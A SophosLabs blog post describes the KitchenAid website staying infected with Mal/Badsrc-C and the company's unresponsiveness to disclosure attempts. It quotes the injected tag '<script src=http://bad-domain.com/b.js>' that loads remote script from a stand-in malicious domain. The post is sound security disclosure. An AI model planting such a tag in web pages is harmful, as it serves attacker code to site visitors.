Mal/Badsrc-C: Why is Kitchenaid.com still infected?

Filed Under: SophosLabs

Update: SophosLabs can confirm that the website has now been cleaned up.

In August last year, SophosLabs first noticed that a Sophos customer was blocked from visiting a page on the KitchenAid website due to a detection of Mal/Badsrc-C.

Over the last six months I and several of my colleagues have been trying to talk to contacts at KitchenAid and Whirlpool to inform them of the issue and offer assistance. We have consistently hit brick walls.

When I initiate a crawl of the KitchenAid site the crawler returns the following results

4 instances of Mal/Badsrc-C found
hxxp://XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://
XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://
XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N
hxxp://
XXXXXXXXXXXXX.kitchenaid.com/main.asp?regID=N&counID=NN&langID=N

The X's representing letters and the N's representing numbers in the above.

Whenever, I talk to customers and people in IT and I tell them we find legitimate websites compromised by malicious code, their natural response is to say 'Do you contact them?'

To which I reply, 'We try but ...'

  • Emailing the address in the WHOIS records gets nowhere because it is either wrong, goes nowhere or messages are not read.
  • Emailing contact details on the websites suffers the same problems.
  • Phoning up to find the IT department is difficult.
  • Once you have found the IT department finding someone who either understands or cares is time consuming.

Some of the responses we do get back are so negative that we wonder why we bother.

The particular sites infected have multiple copies of a

<script src=http://bad-domain.com/b.js>

on the pages and even though the site they point to is currently dead there is no guarantee that it will stay that way.

So why is the KitchenAid site still infected?

If you have any comments or answers then contact this blog via sophosblog@sophos.com.

,

You might like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s